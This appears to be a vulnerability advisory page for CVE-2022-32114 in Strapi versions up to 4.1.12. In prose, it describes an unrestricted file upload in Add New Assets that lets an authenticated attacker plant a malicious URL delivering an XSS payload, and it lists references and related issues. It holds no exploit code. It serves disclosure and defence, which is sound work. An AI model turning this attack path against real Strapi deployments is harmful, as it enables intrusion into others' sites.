Description
An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file. After an authenticated attacker uploads a file containing a malicious URL, a victim copies and pastes the malicious URL into a new tab to receive the XSS payload.
Recommendation
No fix is available yet. Followings are affected versions:
- <= 4.1.12
References
- GHSA-4vm8-j95f-j6v5
- grimthereaperteam.medium.com
- docs.strapi.io
- CVE-2022-32114
- CWE-434
- CWE-79
- CAPEC-310
- OWASP 2021-A3
- OWASP 2021-A4
- OWASP 2021-A6
Related Issues
- Strapi is vulnerable to Insufficient Session Expiration - CVE-2025-3930
- Prototype Pollution in lodash (GHSA-4xc9-xhrj-v574) - CVE-2018-16487
- jquery-validation vulnerable to Cross-site Scripting - CVE-2025-3573
- @mozilla/readability Denial of Service through Regex - CVE-2025-2792
- Tags:
- npm
- @strapi/strapi
Anything's wrong? Let us know Last updated on March 21, 2024